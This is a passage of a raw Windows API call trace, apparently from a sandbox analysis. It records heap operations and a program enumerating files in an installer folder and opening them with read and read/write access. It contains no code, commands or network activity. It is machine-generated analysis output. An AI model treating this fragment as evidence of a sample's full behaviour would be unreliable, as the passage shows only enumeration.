Parameter=0x1086e48, Context=0x0) returned 1 [0061.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.516] AreFileApisANSI () returned 1 [0061.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1055", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1055", lpUsedDefaultChar=0x0) returned 27 [0061.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.516] AreFileApisANSI () returned 1 [0061.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055") returned 27 [0061.516] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055" (normalized: "c:\\588bce7c90097ed212\\1055"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.516] GetLastError () returned 0x5 [0061.516] GetLastError () returned 0x5 [0061.516] SetLastError (dwErrCode=0x5) [0061.516] GetLastError () returned 0x5 [0061.516] SetLastError (dwErrCode=0x5) [0061.516] GetLastError () returned 0x5 [0061.517] SetLastError (dwErrCode=0x5) [0061.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.517] AreFileApisANSI () returned 1 [0061.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055") returned 27 [0061.517] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055" (normalized: "c:\\588bce7c90097ed212\\1055"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.517] GetLastError () returned 0x5 [0061.517] GetLastError () returned 0x5 [0061.517] SetLastError (dwErrCode=0x5) [0061.517] GetLastError () returned 0x5 [0061.517] SetLastError (dwErrCode=0x5) [0061.517] GetLastError () returned 0x5 [0061.517] SetLastError (dwErrCode=0x5) [0061.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0061.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0061.614] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="2052", cAlternateFileName="")) returned 1 [0061.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.615] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78210 [0061.615] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.615] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0061.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0061.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71b00 [0061.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0061.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0061.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.616] AreFileApisANSI () returned 1 [0061.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1055\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1055\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.616] AreFileApisANSI () returned 1 [0061.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 36 [0061.616] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.617] GetFileType (hFile=0x41c) returned 0x1 [0061.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.617] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.617] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.617] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.617] CloseHandle (hObject=0x41c) returned 1 [0061.617] AreFileApisANSI () returned 1 [0061.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0061.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 36 [0061.618] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.618] GetFileType (hFile=0x41c) returned 0x1 [0061.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.618] CloseHandle (hObject=0x41c) returned 1 [0061.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0061.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0061.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.619] AreFileApisANSI () returned 1 [0061.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x693f0 [0061.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 36 [0061.619] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13)) returned 1 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.619] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0061.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0061.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0061.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0061.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0061.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0061.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.620] AreFileApisANSI () returned 1 [0061.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0061.620] AreFileApisANSI () returned 1 [0061.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0061.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 45 [0061.620] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.621] GetFileType (hFile=0x41c) returned 0x1 [0061.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 